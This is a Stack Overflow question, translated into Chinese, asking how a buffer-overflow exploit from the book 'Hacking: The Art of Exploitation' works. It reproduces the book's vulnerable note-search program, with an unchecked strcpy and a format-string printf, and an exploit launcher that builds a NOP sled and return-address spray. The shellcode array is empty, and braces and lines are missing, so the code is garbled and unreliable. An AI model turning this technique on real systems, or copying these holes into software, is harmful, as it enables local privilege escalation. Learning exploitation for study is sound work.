c - 需要帮助了解缓冲区溢出及其利用

标签 c buffer-overflow exploit

我购买了这本书,名为“黑客,利用的艺术”,其中有一个程序是来自书中先前出现的程序的缓冲区溢出漏洞利用。我遇到了一些问题。首先,如果我尝试运行该程序,我会遇到段错误(即使作者运行了与我完全相同的命令,并且他没有遇到任何问题)我的第二个问题是,我认为作者做了一个糟糕的工作解释到底发生了什么。我很困惑这个漏洞是如何确定的 1) 确定偏移值 2) 使用 NOP sled 查找返回地址(这是如何工作的) 3) shellcode 如何说明正在发生的事情/它说什么/我如何读取它。


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include "hacking.h" //Just an error checked malloc and an error message/exit function

#define FILENAME "/var/notes"

void fatal(char *);
int print_notes(int, int, char *);
int find_user_note(int, int);
int search_note(char *, char *);

int main(int argc, char *argv[]) {
    int fd, userid, printing = 1;
    char searchstring[100];

    if (argc > 1)
        strcpy(searchstring, argv[1]);
        searchstring[0] = 0;

    userid = getuid();

    fd = open(FILENAME, O_RDONLY);
    if(fd == -1) {
        fatal("in main opening file");

        printing = print_notes(fd, userid, searchstring);

    printf("-------[ end of note data ]-------\n");

// A function to print the notes for a given uid that match an optional searchstring 
// Returns 0 at end of file, 1 if still more notes
int print_notes(int fd, int uid, char *searchstring){

    int note_length;
    char byte = 0;
    char note_buffer[100];

    note_length = find_user_note(fd, uid);
    if(note_length == -1) //If end of file reached
        return 0;         // Return 0;

    read(fd, note_buffer, note_length); // Read More Data
    note_buffer[note_length] = 0;       // Terminate the String

    if(search_note(note_buffer, searchstring))  //If searchstring found
        printf(note_buffer);            //Print the note
    return 1;

// A function to find the next note for a given userID
// Returns -1 if the end of the file is reached
// Otherwise, it returns the length of the found note
int find_user_note(int fd, int user_uid) {

    int note_uid = -1;
    unsigned char byte;
    int length;

    while(note_uid != user_uid) { // Loop unitl a note for user_uid is found

        if(read(fd, &note_uid, 4) != 4) // Read the uid data
        return -1; // If 4 bytes arent read, return end of file code

        if(read(fd, &byte, 1) != 1) //Read the newline separtor
            return -1;

        byte = length = 0;
        while(byte != '\n') { // Figure out how many bytes to the end of line
            if(read(fd, &byte, 1) != 1) // Read Single byte
                return -1; // If byte isn't read, return end of file code

    lseek(fd, length * -1, SEEK_CUR); // Rewind file by reading length bytes

    printf("[DEBUG] found a %i byte note for user id %i\n", length, note_uid);
    return length;

//A function to search a note for a given keyword
// Returns 1 if a match is found, 0 if there is no match
int search_note(char *note, char *keyword){

    int i, keyword_length, match=0;

    keyword_length = strlen(keyword);
    if(keyword_length == 0) // If there is no searchstring
         return 1; //Always match

    for(i=0; i < strlen(note); i++){ // Iterate over bytes in note
        if(note[i] == keyword[match]) // If byte matches keyword
            match++;    // Get ready to check nexy byte
        else {
            if(note[i] == keyword[match]) // If byte matches keyword    
                match = 1; // Start the match count at 1
                match = 0; // Otherwise its zero

        if(match == keyword_length) // If there is a full match
            return 1; // return match
    return 0; // return not matched 

The exploit that is included is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char shellcode[]=

int main(int argc, char *argv[]) {

     unsigned int i, *ptr, ret, offset = 270;
    char *command, *buffer;

    command = (char *) malloc(200);
    bzero(command, 200); //Zero out the new memory

    strcpy(command, "./notesearch \'");
    buffer = command + strlen(command); // Set buffer at the end

    if(argc > 1) //Set offset
        offset = atoi(argv[1]);

    ret = (unsigned int)&i - offset; //Set return address

    for(i=0; i <160; i+=4) //Fill buffer with return addres
        *((unsigned int *)(buffer + i)) = ret;

    memset(buffer, 0x90, 60); //Build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode) -1);

    strcat(command, "\'");

    system(command); //Run Exploit
    free (command);

请注意该代码:我在分配 i - 偏移地址的行上收到警告。我很确定这是因为我使用的是 64 位机器,指针有 8 个字节,而 unsigned int 只有 4 个字节。为了解决这个问题,我将其类型转换为 long unsigned int。我不确定这是否是好的做法,但当我错了时请纠正我。 所以我把它改成了:

ret = (unsigned int)&i - offset; //Set return address[/code]


system(command); // Run Exploit

我还使用 gdb 彻底检查了程序中所有变量地址的内存,并且我注意到,当本书的作者检查命令变量的内容时(虽然其中有 shellcode),他的输出显示了一堆古怪的字符,但我的输出显示了数字和斜杠。为什么会有差异?


PS-我正在运行 kali linix 64 位,如果(如果这可以帮助您确定某些内容)


 *((unsigned int*)(buffer+i)) = ret;



char big_buffer[10000];
char *searchstring = big_buffer;
char *overflow = big_buffer + 1000;

memset(big_buffer, 0xff, 10000 * sizeof(char));
memset(searchstring, 0, 100);


关于c - 需要帮助了解缓冲区溢出及其利用,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/34347274/


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